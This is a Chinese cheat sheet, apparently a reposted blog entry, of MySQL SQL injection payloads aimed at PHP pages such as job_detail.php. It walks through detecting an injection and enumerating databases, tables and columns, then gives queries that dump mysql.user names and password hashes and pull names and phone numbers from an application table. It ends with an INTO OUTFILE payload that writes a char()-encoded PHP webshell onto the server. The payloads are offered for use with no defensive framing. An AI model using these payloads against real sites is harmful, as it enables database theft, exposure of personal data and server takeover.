总结的php注入语句

chaosa 2015-09-05

展开全文

2008年02月24日星期日 22:291.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 代替。
5.判断数据库连接账号有没有写权限，and (select count(*) from mysql.user)>0 select1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15 frominformation_schema.SCHEMA limit 0,1/*

先用union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES limit 0,1/*把所有的表暴出来
再用union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=要查询的表名17,1/*
屡试不爽
http://localhost/inject.php?id=1 and 1=2 union select concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit 2,1

union select concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM information_schema.SCHEMATA where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file('c:\123.txt'),4,5,6,into outfile'123.php'

/*相关信息查询
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 /* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select 1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1
暴数据库用户名和密码
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

ob_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | RO
W_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_L
ENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         |
CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+---
---------+------------+----------------+-------------+-----------------+--------
------+-----------+----------------+---------------------+---------------------+
------------+-----------------+----------+----------------+---------------+
| NULL          | chinapiao    | air_city   | BASE TABLE | MyISAM |      10 | Dy
namic    |        884 |             39 |       34740 | 281474976710655 |
11264 |         0 |           1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 |
NULL       | utf8_general_ci |     NULL |                |               |
爆出所有库名
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1
^^^information_schema^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1
^^^league^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1
^^^mysql^^^

用selelct查询语句查询数据库
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>120 and 1=1
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>116 and 1=1

/*暴表
跨库查询暴表
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x6c6561677565 limit 1/* and 1=1
跨库查询暴列
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6962665f656d61696c5f6c6f6773 and table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

/*暴列

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*猜解列值

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*写入php一句话木马
<?require($_REQUEST['evil_file_path']);echo "zwell has been here"?>

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1 into outfile '/etc/zwell.php'/* and 1=1 HTTP/1.1